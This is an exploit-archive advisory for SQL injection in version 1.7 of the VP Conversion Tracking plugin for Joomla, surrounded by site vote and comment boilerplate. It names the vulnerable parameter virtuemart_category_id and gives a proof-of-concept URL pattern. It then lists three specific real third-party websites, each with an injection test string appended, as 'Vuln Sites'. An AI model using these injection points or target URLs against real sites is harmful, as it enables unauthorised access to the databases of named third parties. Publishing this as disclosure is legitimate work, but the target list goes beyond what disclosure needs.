Joomla VP Conversion Tracking 1.7 SQL Injection

2018.01.03

Credit: Abde Ouabala

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

######################################################################
# Exploit Title: VP Conversion Tracking Plugin - SQL Injection Vulnerability
# Google Dork: N/A
# Date: 02.01.2018
# Author: Abde Ouabala (@AbdeOuabala)
# url : https://www.virtueplanet.com/extensions/vp-conversion-tracking
# Version : 1.7
# Tested on: BackBox Linux
#
######################################################################
#
# Description : plugin that helps you to track conversations of your Ads
from all advertising platforms like Google AdWords,
Facebook Ads, Shopper Approved Customer Survey, Bing Ads etc.
#
#
# Vulnerable Parameter : virtuemart_category_id
#
#
#POC: index.php?option=com_virtuemart&view=category&virtuemart_category_id=[SQL HERE(--)]
#
#Vuln Sites:
http://demos.virtueplanet.com/vm3/index.php?option=com_virtuemart&view=category&virtuemart_category_id=3"'--&lang=en&Itemid=151
https://www.nordmograph.com/extensions/index.php?option=com_virtuemart&view=category&virtuemart_category_id=20--&Itemid=58
https://www.oread.eu/index.php?option=com_virtuemart&view=category&virtuemart_category_id=45--
######################
# Discovered by : Abde Ouabala (https://www.facebook.com/Sh3ll.Inj3ctor)
# Greetz : Gaa3 Lhbab
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla VP Conversion Tracking 1.7 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.